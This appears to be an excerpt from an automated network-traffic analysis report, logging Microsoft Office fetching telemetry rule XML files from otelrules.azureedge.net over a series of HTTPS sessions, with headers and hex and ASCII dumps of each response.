                                                                                                                                                                                        2024-11-24 01:14:01 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        100192.168.2.54986413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:01 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:01 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:01 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                        x-ms-request-id: 297afce4-701e-0053-438c-3a3a0a000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011401Z-178bfbc474bp8mkvhC1NYCzqnn000000052000000000cg9x
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:01 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        101192.168.2.54986513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:02 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:02 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                        x-ms-request-id: 8d0ecd0b-301e-0020-617e-3b6299000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011402Z-174c587ffdfn4nhwhC1TEB2nbc00000003ug000000009f78
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:02 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        102192.168.2.54986613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:02 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:02 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE6431446"
                                                                                                                                                                                        x-ms-request-id: fde4123d-901e-00a0-613d-3c6a6d000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011402Z-178bfbc474b9fdhphC1NYCac0n0000000580000000004pwp
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:02 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        103192.168.2.54986813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:02 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:02 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1395
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                        x-ms-request-id: aaf9eac1-201e-0000-4977-3ba537000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011402Z-174c587ffdfldtt2hC1TEBwv9c00000003e000000000shg7
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:03 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        104192.168.2.54987213.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:04 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:04 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1358
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                        x-ms-request-id: fa1269cf-b01e-003d-7592-3bd32c000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011404Z-15b8b599d88tr2flhC1TEB5gk400000003ug00000000bg7x
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:04 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        105192.168.2.54987113.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:04 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:04 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1389
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                        x-ms-request-id: f421f7ab-401e-0029-142f-3c9b43000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011404Z-178bfbc474bwh9gmhC1NYCy3rs00000005bg000000007s5h
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:04 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        106192.168.2.54987413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:04 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:04 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                                        x-ms-request-id: 731b5b9c-601e-0001-6b71-3cfaeb000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011404Z-174c587ffdf6b487hC1TEBydsn00000003s00000000029k3
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:04 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        107192.168.2.54987513.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:04 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:04 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:04 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                                        x-ms-request-id: 9613c870-301e-0052-532e-3d65d6000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011404Z-178bfbc474bh5zbqhC1NYCkdug000000053000000000k8sa
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:04 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        108192.168.2.54987613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:05 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:05 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                                                                                                                        x-ms-request-id: 110996dd-801e-0048-7360-3bf3fb000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011405Z-178bfbc474bmqmgjhC1NYCy16c00000005a000000000bv9z
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:05 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        109192.168.2.54987813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
